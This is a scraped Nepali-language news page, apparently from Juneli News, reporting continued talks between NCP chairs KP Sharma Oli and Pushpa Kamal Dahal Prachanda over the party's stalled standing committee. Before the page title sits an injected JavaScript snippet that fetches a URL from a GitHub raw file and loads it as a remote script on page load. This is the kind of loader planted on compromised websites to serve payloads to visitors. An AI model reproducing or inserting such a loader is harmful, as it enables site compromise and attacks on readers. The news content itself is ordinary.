;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ओली र प्रचण्डबीच आज पनि भेटवार्ता, भोलि फेरि छलफल – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • ओली र प्रचण्डबीच आज पनि भेटवार्ता, भोलि फेरि छलफल
जुनेली बिशेष

ओली र प्रचण्डबीच आज पनि भेटवार्ता, भोलि फेरि छलफल

साउन १९,

काठमाण्डौ । नेपाल कम्युनिस्ट पार्टी (नेकपा)का अध्यक्षद्वय केपी शर्मा ओली र पुष्पकमल दाहाल प्रचण्डबीच आज पनि छलफल भएको छ ।

आज बिहान बालुवाटारमा भएको छलफलमा ठोस सहमति नजुटेपछि भोलि फेरि भेटवार्ता हुने ओलीको निजी सचिवालयले जनाएको छ ।

लामो समयको संवादहीनतापछि हिजोदेखि दुई अध्यक्षबीच छलफल सुरु भएको हो । साउन १३ गते ओलीले स्थायी कमिटी बैठक स्थगित गरेपछि प्रचण्डको अध्यक्षतामा त्यही दिन केही नेताहरुको भेला बसेको थियो ।

आन्तरिक विवादका कारण असार १० गतेदेखि सुरु भएको स्थायी कमिटी बैठक अझै टुङ्गोमा पुग्न सकेको छैन ।file Photo

फेसबुक प्रतिक्रियाहरु